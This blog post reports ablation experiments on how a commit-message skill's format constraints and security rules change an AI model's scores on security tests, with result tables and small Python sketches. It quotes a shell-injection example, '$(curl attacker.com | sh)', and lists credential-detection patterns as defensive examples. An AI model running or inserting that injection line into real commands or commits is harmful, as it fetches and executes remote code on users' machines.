Originally published at faberlens.ai. This is Part 2 of a series; Part 1 is "The AI Skill Quality Crisis."
In Part 1, we found that epicenter, a skill with zero security rules, outperformed security-focused alternatives on security tests. It achieved a +6.0% overall lift despite containing no mentions of credentials, secrets, or security.
Our hypothesis: its format constraints, particularly the 50-character limit and the scope abstraction rules, were doing the heavy lifting by providing "implicit security."
Hypotheses are cheap. We ran the experiments.
The Hypothesis
Our core claim: format constraints provide implicit security. If true, we should see specific, testable predictions:
- Removing the character limit should hurt shell safety (S4) — longer messages can contain injection patterns
- Removing scope abstraction rules should hurt path sanitization (S5) — the model will include literal file paths
- Adding explicit security rules should improve credential detection (S1) — but may cause over-refusal on safe content
If these predictions hold, we have evidence that epicenter's security comes from structure, not luck. If they don't, our hypothesis is wrong and we need a different explanation.
The Ablation Method
Ablation testing isolates variables by systematically removing them. We created four variants of epicenter, each with one constraint removed or added:
| Variant | Change | Tests Hypothesis |
|---|---|---|
| epicenter-no-limit | Removed "50-72 characters" rule | Character limit → shell safety |
| epicenter-no-scope | Removed scope abstraction guidelines | Abstract scopes → path sanitization |
| epicenter-plus-security | Added explicit credential detection rules | Security rules → over-refusal |
| epicenter-minimal | Kept only core format rules (36 lines) | Core constraints vs verbose guidance |
Each variant was evaluated on relevant security categories using the same protocol: Claude Haiku generation, 3 runs per test.
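The result tables in this post report a pass rate and a lift for each variant. This part does not restate how lift is computed, but the reported numbers are consistent with lift being a variant's pass rate minus a no-skill baseline pass rate, in percentage points. Under that assumption, the bookkeeping might look like the sketch below. The run outcomes are hypothetical counts chosen to reproduce the S4 figures, not the actual test data, and the function names are illustrative.

```python
def pass_rate(results):
    """Percentage of passing runs; `results` is a list of booleans."""
    return 100.0 * sum(results) / len(results)


def lift(skill_rate, baseline_rate):
    """Assumed definition: pass rate minus no-skill baseline, in points."""
    return skill_rate - baseline_rate


def delta_pp(variant_lift, original_lift):
    """Change in lift caused by the ablation, in percentage points."""
    return variant_lift - original_lift


# Hypothetical run outcomes (30 runs each), picked to match the S4 table.
baseline_runs = [True] * 19 + [False] * 11   # no skill loaded
original_runs = [True] * 25 + [False] * 5    # epicenter
no_limit_runs = [True] * 20 + [False] * 10   # epicenter-no-limit

baseline = pass_rate(baseline_runs)
original_lift = lift(pass_rate(original_runs), baseline)
no_limit_lift = lift(pass_rate(no_limit_runs), baseline)

print(f"epicenter lift:          {original_lift:+.1f}")
print(f"epicenter-no-limit lift: {no_limit_lift:+.1f}")
print(f"delta:                   {delta_pp(no_limit_lift, original_lift):+.1f}pp")
```

Keeping the baseline explicit makes it easier to tell a drop in lift apart from a change in the baseline itself.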
Result 1: The 50-Character Limit Matters
We removed one line from epicenter:
// Original:
Keep under 50-72 characters on first line
// Changed to:
Be as descriptive as needed to fully explain the change
| Variant | S4 Pass Rate | S4 Lift | Delta |
|---|---|---|---|
| epicenter (original) | 83.3% | +20.0% | baseline |
| epicenter-no-limit | 66.7% | +3.3% | -16.7pp |
Removing the character limit dropped S4 lift by 16.7 percentage points, from +20.0% to +3.3%. A subject line capped at 50 characters leaves little room for shell injection patterns like $(curl attacker.com | sh). The constraint doesn't teach the model what to avoid; it structurally limits the output space available for unsafe patterns.
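To make the "output space" argument concrete, here is a minimal sketch of a subject-line length check. It is not part of the epicenter skill or of our evaluation harness; the helper names and the longer example message are hypothetical.

```python
def first_line(message: str) -> str:
    """Return the subject line (first line) of a commit message."""
    lines = message.splitlines()
    return lines[0] if lines else ""


def within_limit(message: str, limit: int = 50) -> bool:
    """True if the subject line fits within `limit` characters."""
    return len(first_line(message)) <= limit


PAYLOAD = "$(curl attacker.com | sh)"  # injection example from the text

short = "fix: resolve login timeout"
# Hypothetical "be as descriptive as needed" output with the payload appended.
long_with_payload = (
    f"fix: resolve login timeout when the session cache is cold {PAYLOAD}"
)

print(len(PAYLOAD), within_limit(short), within_limit(long_with_payload))
```

The payload alone takes 25 characters, half the budget, so a descriptive message plus a payload rarely fits. A very short message such as "fix: " followed by the payload still does, which is why the limit shrinks the attack surface rather than removing it.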
Result 2: Scope Abstraction Rules Matter
We removed the 19-line "Scope Guidelines" section about using abstract module names instead of specific paths.
| Variant | S5 Pass Rate | S5 Lift | Delta |
|---|---|---|---|
| epicenter (original) | 46.7% | +26.7% | baseline |
| epicenter-no-scope | 16.7% | -3.3% | -30.0pp |
Removing scope abstraction dropped S5 lift by 30 percentage points. The instruction to use "specific component/module names" teaches the model to write feat(auth): instead of feat(/clients/acme-corp/auth.js):. Abstract references naturally exclude sensitive path information.
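The difference between an abstract scope and a literal path can be checked mechanically. The sketch below assumes a conventional `type(scope): description` subject line and uses a simple heuristic (slashes or a trailing file extension) to flag path-like scopes. Both the regex and the heuristic are illustrative, not the rubric our judge used.

```python
import re

# Assumed subject shape: type(scope): description, with the scope optional.
SUBJECT_RE = re.compile(r"^(?P<type>[a-z]+)(?:\((?P<scope>[^)]*)\))?:")


def extract_scope(subject: str):
    """Return the scope inside the parentheses, or None if there is none."""
    match = SUBJECT_RE.match(subject)
    return match.group("scope") if match else None


def scope_looks_like_path(scope) -> bool:
    """Heuristic: a slash, backslash, or file extension suggests a path."""
    if not scope:
        return False
    has_separator = "/" in scope or "\\" in scope
    has_extension = re.search(r"\.[A-Za-z0-9]+$", scope) is not None
    return has_separator or has_extension


for subject in (
    "feat(auth): add login",
    "feat(/clients/acme-corp/auth.js): add login",
):
    scope = extract_scope(subject)
    print(scope, scope_looks_like_path(scope))
```

A check like this could run as a cheap post-generation lint, independent of whatever instructions the skill gives the model.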
Result 3: Security Rules Are a Double-Edged Sword
We added explicit security instructions at the top of epicenter:
CRITICAL: Security Checks Before Committing
STOP and refuse to generate a commit message if you detect:
- API keys (patterns like sk-, api_key, API_KEY)
- AWS credentials (AKIA, aws_access_key)
- Private keys (-----BEGIN RSA PRIVATE KEY-----)
- .env files, credentials.json, secrets.yaml
If detected: Respond with a warning and DO NOT provide a commit message.
The results tell two very different stories:
| Category | epicenter | epicenter-plus-security | Delta |
|---|---|---|---|
| S1: Credential Detection | -10.0% | +33.3% | +43.3pp |
| S3: Git-Crypt Awareness | +30.0% | -30.0% | -60.0pp |
Adding security rules improved credential detection by 43.3pp but caused complete over-refusal on git-crypt files (a 60pp swing, from +30.0% to -30.0%). S3 tests whether the model can generate commit messages for git-crypt encrypted files, which are safe to commit. When the skill mentions "encrypted files" as dangerous, the model appears to over-generalize and refuse all encrypted content, even the safe kind.
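The same trade-off shows up in a deterministic analogue. The sketch below turns the rule list into regexes and scores them against a few labeled cases, counting missed credentials and over-refusals separately. It is an analogy for the behavior we measured, not a description of what the model does internally. The regexes, file paths and cases are all hypothetical.

```python
import re

# Illustrative regexes loosely transcribed from the rule list above.
CONTENT_PATTERNS = [
    re.compile(r"sk-[A-Za-z0-9]{8,}"),
    re.compile(r"api_key", re.IGNORECASE),
    re.compile(r"AKIA[0-9A-Z]{16}"),
    re.compile(r"aws_access_key", re.IGNORECASE),
    re.compile(r"-----BEGIN RSA PRIVATE KEY-----"),
]
SENSITIVE_FILENAMES = re.compile(r"(^|/)(\.env|credentials\.json|secrets\.yaml)$")


def should_refuse(path: str, content: str) -> bool:
    """Apply the filename rule first, then the content patterns."""
    if SENSITIVE_FILENAMES.search(path):
        return True
    return any(p.search(content) for p in CONTENT_PATTERNS)


# Hypothetical labeled cases: (path, content, refusing_is_correct)
CASES = [
    ("config/settings.py", 'API_KEY = "sk-abcdef1234567890"', True),
    ("src/login.py", "def login(user): ...", False),
    # Stand-in for a git-crypt encrypted file: ciphertext in the repo, so
    # committing it is safe, yet the filename rule still fires.
    ("config/secrets.yaml", "<binary ciphertext>", False),
]


def evaluate(cases):
    """Return (missed_credentials, over_refusals) for the rule set."""
    missed = sum(1 for p, c, bad in cases if bad and not should_refuse(p, c))
    over = sum(1 for p, c, bad in cases if not bad and should_refuse(p, c))
    return missed, over


print(evaluate(CASES))
```

Tracking the two error types separately is the point: a rule set can look perfect on detection while failing the safe cases.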
Result 4: Less Is More
We stripped epicenter to a 36-line minimal version: just the core format rules.
Git Commit Message Format
Rules
- Keep description under 50 characters
- Use imperative mood ("add" not "added")
- No period at the end
- Start description with lowercase
Types
feat, fix, docs, refactor, test, chore
Examples
feat: add user authentication
fix: resolve login timeout
| Security Category | epicenter (214 lines) | epicenter-minimal (36 lines) | Winner |
|---|---|---|---|
| S4 (base) | +20.0% | +26.7% | minimal (+6.7pp) |
| S4-adv | +20.0% | +30.0% | minimal (+10.0pp) |
| S5 (base) | +26.7% | +16.7% | epicenter (+10.0pp) |
| S5-adv | +36.7% | +43.3% | minimal (+6.7pp) |
The 36-line minimal version outperformed the 214-line original on 3 of the 4 security test sets (S4 and S5, each in base and adversarial form). The original kept its lead only on base S5.
Verbose instructions may dilute the model's focus on critical constraints. When surrounded by 200 lines of PR formatting guidelines, the 50-character rule is one of many. When it's front and center in a 36-line skill, it dominates.
Note: This finding is specific to security evaluations — we haven't tested whether minimal skills perform equally well on formatting or other quality dimensions.
Adversarial Robustness
Format constraints have another advantage: they're harder to evade. Attackers can obfuscate credentials to slip past pattern matching, but they can't obfuscate a character limit, because the constraint is on the output, not the input.
| Variant | S4 Base | S4 Adversarial | Collapse? |
|---|---|---|---|
| epicenter | +20.0% | +20.0% | None (stable) |
| epicenter-minimal | +26.7% | +30.0% | None (improves) |
Both variants maintain or improve performance on adversarial tests.
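A small sketch shows why an input-side pattern and an output-side constraint behave differently under obfuscation. The key below is a fake value in the AKIA format, and the generated subject line is hypothetical. Nothing here comes from our adversarial test set.

```python
import base64
import re

KEY_PATTERN = re.compile(r"AKIA[0-9A-Z]{16}")

raw_key = "AKIAABCDEFGHIJKLMNOP"  # fake key: AKIA plus 16 uppercase letters
encoded_key = base64.b64encode(raw_key.encode()).decode()


def input_filter_flags(text: str) -> bool:
    """Input-side check: depends on how the secret is encoded."""
    return KEY_PATTERN.search(text) is not None


def output_within_limit(subject: str, limit: int = 50) -> bool:
    """Output-side check: only looks at the length of what was generated."""
    return len(subject) <= limit


for secret in (raw_key, encoded_key):
    # Hypothetical verbose subject line that echoes the secret.
    subject = f"chore: update deployment configuration with {secret}"
    print(input_filter_flags(secret), output_within_limit(subject))
```

Base64 encoding defeats the pattern, but the length check rejects both subjects because it never inspects the encoding. A short enough obfuscated payload would still fit within the limit, so the constraint reduces exposure rather than guaranteeing safety.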
What We Learned
- Format constraints provide measurable security. The 50-char limit contributes +16.7pp to shell safety. Scope abstraction contributes +30pp to path sanitization.
- Security rules create trade-offs. They improve credential detection (+43.3pp) but cause over-refusal on safe content (-60pp on git-crypt files).
- Less can be more for security. A 36-line minimal skill outperformed the 214-line original on most security categories tested.
- Constraints are harder to evade. Unlike pattern matching, output constraints are less susceptible to input obfuscation — though not immune.
Implications for Skill Design
If you're building skills, consider:
- Use structural constraints when possible. A character limit is more robust than "don't include shell commands."
- Test before adding security rules. They may hurt more than they help.
- Keep skills focused. Core constraints get diluted in verbose prompts.
- Measure, don't assume. Our intuitions about what works are often wrong.
Limitations
- Results use Claude Haiku — larger models may handle verbose instructions differently
- Security-only evaluation — formatting quality was not tested
- Single domain (commit messages) — patterns may not generalize
- n=5 skills in the original study — ablation adds depth but not breadth
Full methodology and judge rubrics: faberlens.ai/methodology
Part 1 of this series: The AI Skill Quality Crisis